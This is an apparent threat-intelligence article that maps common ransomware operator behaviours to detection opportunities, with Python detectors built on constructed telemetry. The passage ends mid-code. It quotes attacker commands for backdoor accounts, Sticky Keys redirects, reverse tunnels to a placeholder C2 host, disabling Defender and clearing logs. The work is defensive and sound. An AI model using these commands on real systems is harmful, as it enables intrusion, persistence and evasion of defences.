*Published: 4/15/2026*
> **BLUF:** Across 10+ ransomware operations - Akira, Play, Qilin, Chaos, Embargo, TheGentlemen, Black Basta, LockBit, Fog, Hunters International, RansomHub, Lynx - the same operator behaviors repeat with remarkable consistency. Despite different tooling, different tempo, different sophistication levels, the operators all funnel through the same narrow set of behaviors at every phase of the kill chain. Those bottlenecks are the chokepoints. This article identifies them, shows which groups converge at each one, and maps the detection opportunities that matter most - regardless of what EDR you run.
---
## Why Chokepoints
Single-group threat profiles tell you what *one operation does*. Cross-group analysis tells you what *ransomware operators do* - the structural behaviors that persist regardless of which RaaS program is cutting the check.
Most detection engineering focuses on the unique: a specific loader's DGA, a custom EDR killer's driver hash, a novel persistence mechanism. That work matters. But the highest-ROI detections target the behaviors that *every operator reaches for* - the commands that appear because they solve universal problems (find domain admins, move laterally, kill backups), not because any particular group is innovative.
A chokepoint is a behavior where the operator has no good alternative. They *must* enumerate the domain. They *must* move laterally. They *must* delete shadow copies. The tooling varies, but the options are finite - and at each chokepoint, 3-5 detection signatures cover the entire space.
This analysis draws from:
- **Firsthand IR telemetry** - 5 intrusions across Akira and Play (documented in [[Three Akira Intrusions Compared]] and [[Two PlayCrypt Intrusions Compared]])
- **Vendor IR reporting** - Sophos Active Adversary Reports (2025, 2026), DFIR Report case studies (Fog, LockBit, BlackSuit, Lynx, multi-affiliate), Huntress 2025 Cyber Threat Report, eSentire TRU (Hunters International)
- **Government advisories** - CISA #StopRansomware: Akira (AA24-109A), Play (AA23-352A), Black Basta (AA24-131A), RansomHub (AA24-242a), Rhysida (AA23-319a), Interlock (AA25-203a)
The groups span closed operations (Play), open RaaS (Qilin, RansomHub), Conti-lineage (Akira, Chaos), independent operators (TheGentlemen, Payouts King), and state-affiliated actors (Embargo/Storm-0501, Qilin/Moonstone Sleet). The behavioral convergence across this diversity is the point.
---
## Chokepoint 1: Initial Access - The Edge Device Problem
Initial access is the most variable phase - but less variable than most people think. The options are:
| Vector | Groups Observed | Pattern |
|---|---|---|
| Compromised VPN/RDP credentials | Akira, Play, Qilin, Chaos, Fog, LockBit, Lynx, Hunters Int'l, Payouts King | Stolen creds or IAB purchase |
| Edge device exploitation (FortiOS, SonicWall, Citrix, Exchange) | Akira, Play, Embargo, Fog, Hunters Int'l, Interlock | N-day vulns, not 0-day |
| Social engineering (vishing, ClickFix, email spam) | Chaos, Qilin (ScreenConnect supply chain), Black Basta | Human-operated from minute one |
| RMM tool abuse (ScreenConnect, SimpleHelp, Atera) | Play (SimpleHelp CVE-2024-57727), Akira (Atera portal) | Trusted tool as attack vector |
The chokepoint isn't the specific exploit - it's the fact that all roads lead to one of two outcomes: **a remote interactive session** (RDP, VPN, RMM) or **a web shell/beacon callback**. Both produce detectable artifacts:
- **Remote sessions** - Type 10 (RDP) or Type 3 (network) logon events from unexpected sources. The signal is the source, not the session.
- **RMM abuse** - AnyDesk, ScreenConnect, Atera, SimpleHelp executing on endpoints where they aren't sanctioned. Sophos 2026 confirms AnyDesk as the most abused RMM tool across all IR cases.
- **Edge device compromise** - VPN auth logs showing successful login after brute force burst, or successful auth from impossible geography.
The Huntress 2025 report found that **recon commands execute within ~20 minutes of initial access**. The window between access and first detectable post-exploitation behavior is short - but it exists, and it starts with auth log anomalies.
> **Detection Opportunity:** Monitor for RDP (Type 10) and network (Type 3) logon events from unmanaged IPs. Detect unsanctioned RMM tool execution via PE metadata.
>
> See rule: [[edr-win-persist-rmm-deployment]]
---
## Chokepoint 2: Domain Reconnaissance - The Same Five Commands
Every ransomware operator needs to answer the same questions: *Where are the domain controllers? Who are the domain admins? What's the network topology?* There are only so many ways to ask.
| Command | Groups | Count |
|---|---|---|
| `nltest /dclist:` or `/domain_trusts` | Akira, Chaos, Embargo, Qilin, Play, Fog, LockBit, Black Basta, RansomHub, Lynx | **10+** |
| `net group "Domain Admins" /domain` | Akira, Chaos, Embargo, Qilin, Play, Fog, LockBit, Black Basta, RansomHub, Hunters Int'l | **10+** |
| `whoami` / `whoami /user` | Akira, Chaos, Play, Fog, LockBit, BlackSuit, Lynx | **7+** |
| SoftPerfect Network Scanner (`netscan.exe`) | Akira, Qilin, Play, TheGentlemen, Fog | **5+** |
| AdFind (`adfind.exe`) | Akira, Play, RansomHub | **3+** |
| BloodHound / SharpHound | Play, RansomHub, Black Basta | **3+** |
`nltest` and `net group "Domain Admins"` are functionally universal. They appear in every CISA advisory, every DFIR Report case, every intrusion we've analyzed. These two commands are the single highest-confidence early indicators of hands-on-keyboard ransomware operator activity.
The tools vary in Tier 2 - AdFind vs BloodHound vs PowerView vs custom .NET enumerators (Play's Grixba) - but the Tier 1 commands are invariant because they're built into Windows. No download, no staging, no detection evasion needed. The operator types them from memory.
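As an added example (not code from the original analysis), the two Tier-1 commands above expressed as a detector over constructed Sysmon-style process events: it treats `whoami` only as supporting evidence and clusters hits per host inside the ~20-minute recon window cited earlier. The `enterprise admins` variant, the sample events and the two-command threshold are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon EID 1 / 4688 style); not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2026-04-01T02:11:05", "host": "WS-0412", "user": "CORP\\jdoe",
     "cmdline": "whoami /user"},
    {"ts": "2026-04-01T02:11:40", "host": "WS-0412", "user": "CORP\\jdoe",
     "cmdline": "C:\\Windows\\system32\\nltest.exe /dclist:corp.local"},
    {"ts": "2026-04-01T02:12:03", "host": "WS-0412", "user": "CORP\\jdoe",
     "cmdline": 'net1  group "Domain Admins" /domain'},   # net.exe hands off to net1.exe
    {"ts": "2026-04-01T02:13:10", "host": "WS-0412", "user": "CORP\\jdoe",
     "cmdline": "nltest /domain_trusts /all_trusts"},
    # An inventory script on another host runs one nltest and, hours later, one whoami:
    # a single Tier-1 command in isolation should not page anyone.
    {"ts": "2026-04-01T09:00:00", "host": "WS-0099", "user": "CORP\\svc_inv",
     "cmdline": "nltest /dclist:corp.local"},
    {"ts": "2026-04-01T13:30:00", "host": "WS-0099", "user": "CORP\\svc_inv",
     "cmdline": "whoami"},
]

# Tier-1 commands from the table above; "enterprise admins" is added as the obvious sibling.
TIER1 = {
    "nltest_dc_or_trust": re.compile(r"\bnltest(\.exe)?\b.*?(/dclist|/domain_trusts)"),
    "net_priv_group": re.compile(
        r"\bnet1?(\.exe)?\s+group\s+\"?(domain|enterprise) admins\"?\s+/domain\b"),
}
# Low confidence alone, but it raises confidence when it sits next to a Tier-1 hit.
SUPPORTING = {"whoami": re.compile(r"\bwhoami(\.exe)?\b")}
RECON_WINDOW = timedelta(minutes=20)   # Huntress: recon starts ~20 min after access


def normalize(cmdline):
    """Lower-case and collapse whitespace so spacing tricks do not break matching."""
    return re.sub(r"\s+", " ", cmdline.strip().lower())


def classify(cmdline):
    """Return (label, is_tier1) for a recon command, or (None, False)."""
    c = normalize(cmdline)
    for label, rx in TIER1.items():
        if rx.search(c):
            return label, True
    for label, rx in SUPPORTING.items():
        if rx.search(c):
            return label, False
    return None, False


def find_recon_clusters(events, window=RECON_WINDOW):
    """Alert per host when a sliding window holds at least one Tier-1 command and
    at least two distinct recon commands overall (Tier-1 + Tier-1, or Tier-1 + whoami)."""
    per_host = defaultdict(list)
    for ev in events:
        label, tier1 = classify(ev["cmdline"])
        if label:
            per_host[ev["host"]].append(
                (datetime.fromisoformat(ev["ts"]), label, tier1, ev["user"]))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _, _, user) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            labels = {h[1] for h in in_window}
            if any(h[2] for h in in_window) and len(labels) >= 2:
                alerts.append({"host": host, "user": user, "start": t0.isoformat(),
                               "commands": sorted(labels), "count": len(in_window)})
                break   # one alert per host is enough to open the investigation
    return alerts
```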
> **Detection Opportunity:**
>
> See rule(s): [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-adfind-enum]] | [[edr-win-disc-netscan-deployment]]
---
## Chokepoint 3: Credential Access - LSASS Is the Funnel
Despite years of EDR investment, LSASS credential dumping remains the single most common credential access technique across ransomware operations. The operator needs domain admin credentials. LSASS has them. Everything funnels through it.
| Technique | Groups | Count |
|---|---|---|
| Mimikatz `sekurlsa::logonPasswords` | Akira, Chaos, Qilin, Play, TheGentlemen, LockBit, Black Basta, RansomHub, Fog | **9+** |
| LSASS dump via `comsvcs.dll MiniDump` | Akira, Black Basta, RansomHub | **3+** |
| Registry hive dump (`reg save HKLM\SAM`) | Akira, Play, Embargo | **3+** |
| Kerberoasting | Akira, Chaos, Play, RansomHub | **4+** |
| Veeam credential extraction | Akira, Fog, Hunters International | **3+** |
| Browser credential theft (`esentutl.exe /y`) | Akira (2/3 observed intrusions) | Emerging |
| Chrome harvest via GPO logon script | Qilin | Novel |
| WDigest `UseLogonCredential=1` | Qilin, TheGentlemen | **2+** |
The chokepoint: whether the operator uses Mimikatz, `comsvcs.dll`, ProcDump, or a custom tool - they're all accessing `lsass.exe` memory. The process target is the invariant. Monitor for any non-standard process accessing LSASS memory, and you catch 9+ groups with one detection.
Veeam credential extraction is the high-value secondary. It appears in fewer groups, but it grants access to backup infrastructure - the operator's primary target for ensuring encryption sticks.
> **Detection Opportunity:**
>
> See rule(s): [[edr-win-cred-lsass-minidump]] | [[edr-win-cred-reg-hive-dump]] | [[edr-win-cred-veeam-db-access]] | [[edr-win-cred-browser-esentutl]] | [[edr-win-cred-ntlm-internal-monologue]]
---
## Chokepoint 4: Persistence - Fewer Options Than You Think
Persistence mechanisms look diverse at first glance - every group seems to use different tools. But the underlying Windows mechanisms are a finite, well-known set. The operator needs code to survive a reboot. On Windows, the options are:
| Mechanism | Groups | Pattern |
|---|---|---|
| **Scheduled tasks** (`schtasks`) | Play, Qilin, Embargo, Black Basta | Task creation → payload re-execution |
| **Registry Run keys** (`HKLM\...\Run`, `HKCU\...\Run`) | TheGentlemen, Black Basta, RansomHub | Classic autostart persistence |
| **New services** (`sc create`) | Akira (nssm.exe as fake "sysmon"), Embargo (`irnagentd`), Play (PsExec services) | Service-based persistence or lateral movement |
| **RMM tools** (AnyDesk, ScreenConnect, RustDesk, etc.) | Akira, Chaos, Embargo, Qilin, TheGentlemen, RansomHub | Legitimate tool as persistence |
| **IFEO debugger redirects** (Sticky Keys) | TheGentlemen | `sethc.exe` → `cmd.exe` |
| **WMI event subscriptions** | Black Basta, RansomHub | WMI filter → consumer → binding |
| **DCOM object hijack** | Observed in Cobalt Strike deployments | COM object registration for beacon callback |
| **Local account creation** | Akira, Chaos, Play, TheGentlemen, Fog, LockBit | `net user /add` → `localgroup administrators /add` |
| **Reverse tunnels** (cloudflared, ngrok, chisel, ligolo) | Akira, Qilin, TheGentlemen | Outbound HTTPS bypasses inbound rules |
The chokepoint: all persistence eventually registers itself with the OS through one of ~6 mechanisms: scheduled task, service, registry autostart, WMI subscription, COM object, or startup folder. Each has a well-defined telemetry surface. The *tools* vary endlessly - the *registration points* don't.
Local account creation deserves special attention. It appears in at least 6 groups and is often the first persistence mechanism deployed:
```
net user [backdoor_account] [password] /add
net localgroup administrators [backdoor_account] /add
```
Scheduled task persistence is the next most common. Observed patterns:
```
schtasks /create /tn "Update" /tr "ssh.exe -R 7777 -p 443 user@[C2]" /sc minute /mo 5 /ru SYSTEM
powershell New-ScheduledTaskAction -Execute 'payload.exe' ... Register-ScheduledTask -TaskName '[name]'
```
IFEO debugger redirects (Sticky Keys) provide pre-auth SYSTEM access from the login screen:
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
```
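As an added example (not from the original analysis) covering the two persistence patterns just shown: one function pairs a `net user ... /add` with a later `net localgroup administrators ... /add` for the same account on the same host, and another flags any `Debugger` value set under Image File Execution Options, rating the accessibility binaries (`sethc.exe`, `utilman.exe` and their siblings) as critical. The sample process and Sysmon EID 13 registry records are constructed, and the 30-minute pairing window is my choice.

```python
import re
from datetime import datetime, timedelta

NET_USER_ADD = re.compile(r"\bnet1?(\.exe)?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)
NET_LOCALGROUP_ADMIN = re.compile(
    r"\bnet1?(\.exe)?\s+localgroup\s+\"?administrators\"?\s+(\S+)\s+/add\b", re.I)
IFEO_DEBUGGER = re.compile(r"\\image file execution options\\([^\\]+\.exe)\\debugger$", re.I)
# Binaries reachable from the logon screen; a Debugger value on any of them is a pre-auth backdoor.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}

# Constructed sample events (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"ts": "2026-04-02T01:02:00", "host": "FS01", "cmdline": "net user sysadm P@ssw0rd! /add"},
    {"ts": "2026-04-02T01:02:09", "host": "FS01", "cmdline": "net localgroup administrators SysAdm /add"},
    {"ts": "2026-04-02T08:15:00", "host": "HR-WS7", "cmdline": "net user intern2026 Welcome1 /add"},
    {"ts": "2026-04-02T08:15:30", "host": "HR-WS7",
     "cmdline": 'net localgroup "Remote Desktop Users" intern2026 /add'},   # not an admin grant
]
SAMPLE_REGISTRY_EVENTS = [   # Sysmon EID 13 RegistryEvent (Value Set)
    {"host": "FS01", "Details": "cmd.exe", "TargetObject":
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger"},
    {"host": "DEV03", "Details": r"C:\Tools\windbg\windbgx.exe", "TargetObject":
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe\Debugger"},
    {"host": "FS01", "Details": "DWORD (0x00000000)", "TargetObject":
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\DisableExceptionChainValidation"},
]


def backdoor_account_alerts(events, window=timedelta(minutes=30)):
    """Pair 'net user X ... /add' with a later 'net localgroup administrators X /add' on the
    same host. Account names are compared case-insensitively: operators rarely type them
    the same way twice."""
    pending, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        m = NET_USER_ADD.search(ev["cmdline"])
        if m:
            pending[(ev["host"], m.group(2).lower())] = t
            continue
        m = NET_LOCALGROUP_ADMIN.search(ev["cmdline"])
        if m:
            created = pending.get((ev["host"], m.group(2).lower()))
            if created is not None and t - created <= window:
                alerts.append({"host": ev["host"], "account": m.group(2),
                               "seconds_between": int((t - created).total_seconds())})
    return alerts


def ifeo_debugger_alerts(registry_events):
    """Any Debugger value under IFEO redirects that binary; accessibility targets are critical."""
    alerts = []
    for ev in registry_events:
        m = IFEO_DEBUGGER.search(ev["TargetObject"])
        if not m:
            continue
        target = m.group(1).lower()
        alerts.append({"host": ev["host"], "hijacked": target, "debugger": ev["Details"],
                       "severity": "critical" if target in ACCESSIBILITY_BINARIES else "medium"})
    return alerts
```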
> **Detection Opportunity:**
>
> See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]]
---
## Chokepoint 5: Reverse Tunneling - Outbound C2 on a Short List
Operators need a command-and-control channel that survives firewall rules. The solution: outbound tunnels over HTTPS or SSH that bypass inbound restrictions. The tool list is short and well-known.
| Tool | Groups | Protocol |
|---|---|---|
| Cloudflared (`cloudflared.exe tunnel run --token`) | Akira | HTTPS tunnel via Cloudflare |
| ngrok (`ngrok tcp 3389`) | TheGentlemen, Qilin | HTTPS tunnel, RDP over ngrok |
| Chisel | Fog, RansomHub | HTTP/HTTPS tunnel |
| Ligolo-ng | Akira | Reverse tunnel, TUN interface |
| Reverse SSH (`ssh -R`) | Chaos | SSH tunnel over port 443 |
| SystemBC | Play, Qilin | SOCKS5 proxy |
| Cobalt Strike Beacon | Akira, Embargo, Play, Qilin, LockBit, Black Basta, Fog | HTTPS malleable C2 |
The chokepoint: there are only ~5 widely-used tunneling tools in the ransomware ecosystem. Every one of them is detectable by binary name, PE metadata, or behavioral pattern. Cobalt Strike is the outlier (harder to detect at the network level), but the tunneling tools are easy wins.
Observed command patterns:
```
cloudflared.exe tunnel run --token eyJhIjoiNjM2NWUy[...]
ngrok config add-authtoken [token] && ngrok tcp 3389
chisel client [C2]:8080 R:socks
ssh -R 443:[local_ip]:22 user@[C2] -fN
nssm.exe install sysmon C:\ProgramData\ligolo.exe
```
The TheGentlemen toolkit illustrates this well: ngrok batch scripts run `ngrok config add-authtoken` then `ngrok tcp 3389`, tunneling RDP over HTTPS. Two ngrok tokens for redundancy. If ngrok is blocked, RustDesk provides a fallback on an independent relay network.
> **Detection Opportunity:** Alert on execution of cloudflared, ngrok, chisel, or ligolo by binary name or PE metadata. These tools have near-zero legitimate use in most enterprise environments.
>
> See rule: [[edr-win-c2-reverse-tunneling]]
---
## Chokepoint 6: Lateral Movement - Three Roads, One Destination
Lateral movement has the tightest convergence of any phase. The operator needs to execute commands on remote hosts. On Windows, there are three roads:
### Road 1: Impacket (WmiExec / SmbExec / AtExec)
| Groups | Count |
|---|---|
| Akira, Chaos, Embargo, Play, Qilin, Fog, LockBit, Black Basta, RansomHub | **9+** |
Impacket accounts for **36% of all tools** observed in Sophos 2026 IR cases, with an 83% year-over-year increase. It's the dominant lateral movement framework across the ecosystem.
WmiExec's output redirection signature is the single highest-fidelity lateral movement detection available:
```
cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
```
The `\\127.0.0.1\ADMIN$\__<float>` pattern is invariant across every group that uses Impacket; the float is the Unix timestamp WmiExec appends to the temp file name. It writes command output to that file in the ADMIN$ share and reads it back. This generated 16 cases in a single operational queue during one Akira intrusion.
SmbExec creates a service on the remote host for command execution. AtExec uses the task scheduler. All three Impacket modules leave distinct process creation artifacts.
> **Detection Opportunity:**
>
> See rule: [[edr-win-lat-impacket-wmiexec]]
### Road 2: PsExec and Variants (PsExec, PAExec, csexec)
| Groups | Count |
|---|---|
| Play, Qilin, Black Basta, LockBit, TheGentlemen | **5+** |
PsExec deploys `PSEXESVC.exe` as a service on the remote host, then executes commands through it. The detection surface is Event ID 7045 (new service installed) with:
- Random alphanumeric service names (PsExec default) or known service names (`PSEXESVC`)
- Binary paths in `C:\Windows\` with random names
- Service account: the compromised domain admin
PAExec is the open-source alternative. Some groups use csexec (CrackMapExec's variant). Different binary, identical behavioral pattern: remote service creation, command execution, service cleanup.
In the Play intrusion we documented, PsExec created 8+ services across 15+ hosts in rapid succession:
```
7045 | R7KXNQ4VHJ2D | C:\Windows\R7KXNQ4VHJ2D.exe | DOMAIN\Administrator
7045 | M3YPWT8FG6AE | C:\Windows\M3YPWT8FG6AE.exe | DOMAIN\Administrator
7045 | J9BHZC5NLR1X | C:\Windows\J9BHZC5NLR1X.exe | DOMAIN\Administrator
```
Random 12-character alphanumeric service names. Each service dropped a unique ransomware binary to `C:\Users\Public\Music\`.
> **Detection Opportunity:** Event ID 7045 with random service names and binaries in `C:\Windows\` is PsExec's signature. PAExec and csexec produce the same artifact.
>
> See rule: [[edr-win-lat-remote-psexec]]
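An added example (mine, not from the original analysis) serving both Road 1 and Road 2: a parser for WmiExec's output-redirect grammar that also recovers the operator-side timestamp from the `__<float>` suffix, and a classifier for Event ID 7045 records that groups PsExec-family service installs into bursts across hosts. Sample command lines and 7045 records are constructed; the 10-minute window and the three-host burst threshold are my assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# WmiExec's fixed output-redirect grammar; the __ suffix is time.time() on the operator's box.
WMIEXEC_REDIRECT = re.compile(
    r"cmd\.exe\s+/q\s+/c\s+(?P<cmd>.+?)\s+1>\s*\\\\127\.0\.0\.1\\admin\$\\__"
    r"(?P<epoch>\d+(?:\.\d+)?)\s+2>&1", re.I)
RANDOM_SERVICE = re.compile(r"^[A-Z0-9]{12}$")

# Constructed sample telemetry (not real).
SAMPLE_PROCESS_EVENTS = [
    {"host": "SRV-01", "cmdline": r'cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1712000000.123 2>&1'},
    {"host": "SRV-01", "cmdline": r'cmd.exe /Q /c net group "Domain Admins" /domain 1> \\127.0.0.1\ADMIN$\__1712000031.5 2>&1'},
    {"host": "SRV-02", "cmdline": r'cmd.exe /c dir 1> C:\Temp\out.txt 2>&1'},   # ordinary redirect
]
SAMPLE_7045_EVENTS = [
    {"ts": "2026-04-03T03:40:00", "host": "SRV-01", "ServiceName": "R7KXNQ4VHJ2D", "ImagePath": r"C:\Windows\R7KXNQ4VHJ2D.exe"},
    {"ts": "2026-04-03T03:40:04", "host": "SRV-02", "ServiceName": "M3YPWT8FG6AE", "ImagePath": r"C:\Windows\M3YPWT8FG6AE.exe"},
    {"ts": "2026-04-03T03:40:09", "host": "SRV-03", "ServiceName": "PSEXESVC", "ImagePath": r"C:\Windows\PSEXESVC.exe"},
    {"ts": "2026-04-03T03:41:15", "host": "SRV-04", "ServiceName": "PAExec-1234-OPS", "ImagePath": r"C:\Windows\PAExec-1234-OPS.exe"},
    {"ts": "2026-04-03T11:00:00", "host": "WS-0099", "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe"},
]


def match_wmiexec(cmdline):
    """Return the remote command and the operator-side timestamp, or None."""
    m = WMIEXEC_REDIRECT.search(cmdline)
    if not m:
        return None
    stamp = datetime.fromtimestamp(float(m.group("epoch")), tz=timezone.utc)
    return {"command": m.group("cmd"), "operator_clock_utc": stamp.isoformat()}


def classify_service_install(ev):
    """Map a 7045 record to a PsExec-family artifact, or None."""
    name = ev["ServiceName"]
    path = ev["ImagePath"].strip('"').lower()
    if name.upper() == "PSEXESVC" or path.endswith(r"\psexesvc.exe"):
        return "psexec"
    if name.upper().startswith("PAEXEC") or "\\paexec" in path:
        return "paexec"
    if RANDOM_SERVICE.match(name) and path == "c:\\windows\\" + name.lower() + ".exe":
        return "psexec-random-name"
    return None


def service_install_bursts(events, window=timedelta(minutes=10), min_hosts=3):
    """One alert per burst: at least min_hosts distinct hosts receive a PsExec-family
    service inside `window`. A lone PSEXESVC on one box is an admin; a spread is deployment."""
    hits = sorted((datetime.fromisoformat(e["ts"]), e["host"], classify_service_install(e))
                  for e in events if classify_service_install(e))
    alerts, i = [], 0
    while i < len(hits):
        t0 = hits[i][0]
        burst = [h for h in hits[i:] if h[0] - t0 <= window]
        hosts = sorted({h[1] for h in burst})
        if len(hosts) >= min_hosts:
            alerts.append({"start": t0.isoformat(), "hosts": hosts,
                           "kinds": sorted({h[2] for h in burst})})
            i += len(burst)          # skip past this burst
        else:
            i += 1
    return alerts
```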
### Road 3: RDP and SSH
| Groups | Count |
|---|---|
| Akira, Chaos, Play, Qilin, Embargo, Fog, LockBit, BlackSuit, Lynx, Hunters Int'l | **10+** |
RDP is the most abused legitimate tool across the ecosystem - 66% of Sophos 2026 IR cases involved internal RDP lateral movement. It's the hardest chokepoint to detect because it's also the most common legitimate admin tool.
The signal isn't "RDP happened" - it's "RDP happened from an unexpected source." Detection requires:
1. Asset inventory - which IPs have EDR agents
2. Auth log correlation - Type 10 logon from unmanaged IP
3. Behavioral baselining - which accounts normally RDP, and to where
Operators frequently enable RDP on hosts where it's disabled, creating a second detectable artifact:
```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
powershell Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```
This registry modification + firewall rule change pattern appeared in both Play intrusions, plus Akira and Embargo.
SSH lateral movement is less common but growing - Chaos used reverse SSH over port 443, and ESXi-targeting operators use SSH to reach hypervisors. The same principle applies: SSH from a Windows endpoint to an internal host is anomalous in most environments.
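An added example (mine, not from the original analysis) of the three-step RDP logic above, which also covers the Chokepoint 1 detection opportunity for Type 10 and Type 3 logons from unmanaged sources: each constructed 4624 record is graded against an asset inventory, an internal address plan, and a baseline of known account/source RDP pairs. The inventory, baseline, address ranges and sample logons are placeholders for what an EDR console, IPAM and SIEM would supply.

```python
import ipaddress

# Assumptions: inventory, baseline and address plan are placeholders for your own data.
MANAGED_ASSETS = {"10.10.1.5", "10.10.1.6", "10.10.2.20"}           # sources that run an EDR agent
RDP_BASELINE = {("corp\\it.admin", "10.10.1.5")}                    # (account, source) pairs seen recently
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOGON_KINDS = {"10": "rdp", "3": "network"}

# Constructed sample 4624 records (not real logs).
SAMPLE_LOGONS = [
    {"host": "DC01", "LogonType": "10", "IpAddress": "10.10.1.5", "TargetDomainName": "CORP", "TargetUserName": "it.admin"},
    {"host": "DC01", "LogonType": "10", "IpAddress": "10.10.9.77", "TargetDomainName": "CORP", "TargetUserName": "it.admin"},    # unmanaged internal
    {"host": "VPN-GW", "LogonType": "3", "IpAddress": "203.0.113.45", "TargetDomainName": "CORP", "TargetUserName": "jdoe"},     # outside internal ranges
    {"host": "FS01", "LogonType": "3", "IpAddress": "10.10.2.20", "TargetDomainName": "CORP", "TargetUserName": "WS-0412$"},    # machine account noise
    {"host": "FS01", "LogonType": "10", "IpAddress": "10.10.1.6", "TargetDomainName": "CORP", "TargetUserName": "svc_backup"},  # managed, new RDP pair
    {"host": "FS01", "LogonType": "2", "IpAddress": "-", "TargetDomainName": "CORP", "TargetUserName": "jdoe"},                 # console logon
]


def classify_logon(ev, managed=MANAGED_ASSETS, baseline=RDP_BASELINE):
    """Grade one 4624 record. The source address, not the session itself, is the signal."""
    kind = LOGON_KINDS.get(str(ev["LogonType"]))
    if kind is None:
        return None
    src = ev.get("IpAddress", "-")
    if src in ("-", "::1", "127.0.0.1"):
        return None                                     # console or sourceless logons
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return None
    account = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower()
    if kind == "network" and account.endswith("$"):
        return None                                     # computer accounts dominate Type 3 volume
    finding = {"kind": kind, "account": account, "source": src, "host": ev["host"]}
    if not any(ip in net for net in INTERNAL_RANGES):
        return {**finding, "severity": "critical", "reason": "source outside internal address space"}
    if src not in managed:
        return {**finding, "severity": "high", "reason": "source has no EDR agent in inventory"}
    if kind == "rdp" and (account, src) not in baseline:
        return {**finding, "severity": "medium", "reason": "account/source pair not in RDP baseline"}
    return None


def triage_logons(events):
    """Return only the findings, highest severity first."""
    order = {"critical": 0, "high": 1, "medium": 2}
    found = [f for f in (classify_logon(e) for e in events) if f]
    return sorted(found, key=lambda f: order[f["severity"]])
```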
### The Lateral Movement Chokepoint
Three roads, all detectable. Impacket and PsExec have process-creation signatures. RDP has auth log signatures. Together, these three mechanisms account for the vast majority of observed lateral movement. An operator who can't use any of them is stuck on the beachhead.
---
## Chokepoint 7: Defense Evasion - Everyone Kills Defender
The defense evasion phase shows the widest variation in *method* but near-total convergence on *target*: Windows Defender. Every group disables it. They just disagree on how.
| Technique | Groups | Count |
|---|---|---|
| `Set-MpPreference -DisableRealtimeMonitoring` | Akira, Play, Fog, LockBit, Black Basta | **5+** |
| Defender registry tampering (`DisableAntiSpyware`, etc.) | Play, TheGentlemen, Embargo, RansomHub | **4+** |
| `Set-MpPreference -ExclusionPath` | Akira, Play, TheGentlemen | **3+** |
| `mpcmdrun.exe -RemoveDefinitions -All` | Play, TheGentlemen | **2+** |
| `wevtutil cl` (event log clearing) | Akira, Chaos, Play, TheGentlemen, Qilin, LockBit | **6+** |
| BYOVD EDR killer | Akira (Zemana), Embargo (probmon.sys), Qilin (rwdrv.sys), RansomHub (EDRKillShifter) | **4+** |
| `bcdedit /set safeboot network` | Akira, Embargo, Qilin | **3+** |
The composite Defender kill sequence, observed across Play, TheGentlemen, and Embargo, looks like this when you stack the commands:
```
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
Set-MpPreference -ExclusionPath C:\Users\Public\Music
mpcmdrun.exe -RemoveDefinitions -All
Set-MpPreference -ExclusionExtension .exe
```
And the anti-forensic cleanup:
```
wevtutil cl Security
wevtutil cl System
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
```
Event log clearing via `wevtutil cl` is the most common anti-forensic technique - 6+ groups. Its absence in an intrusion is more notable than its presence.
BYOVD-based EDR killers are the emerging trend. Four groups now use kernel-driver-based process termination, each with different drivers. Hash-based detection is useless - the drivers change per deployment. Behavioral detection (driver load + service creation + protected process termination pattern) is the only durable approach.
The TheGentlemen toolkit is the extreme case: 6 redundant Defender-killing methods (`dControl.exe`, `ConfigureDefender.exe`, `WinDefGpo_Reg.ps1`, `def1.bat`, `z.bat`, `ExcTool`) - because at least one will succeed against any single EDR configuration.
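An added example (mine, not from the original analysis) that scores the stacked Defender kill sequence above per host: it parses `Set-MpPreference` parameters (recording which paths and extensions were excluded, the quickest pivot to the staging directory), `mpcmdrun -RemoveDefinitions`, the policy-key registry writes, and `wevtutil cl`, which is recorded but not counted as a Defender technique. The sibling `Disable*`/`Exclusion*` parameters beyond the three in the table, the three-technique threshold, and all sample records are my assumptions.

```python
import re

SET_MPPREF = re.compile(r"set-mppreference\b(?P<args>.*)", re.I)
PARAM = re.compile(r"-(?P<name>[A-Za-z]+)\s+(?P<value>\"[^\"]*\"|'[^']*'|\S+)")
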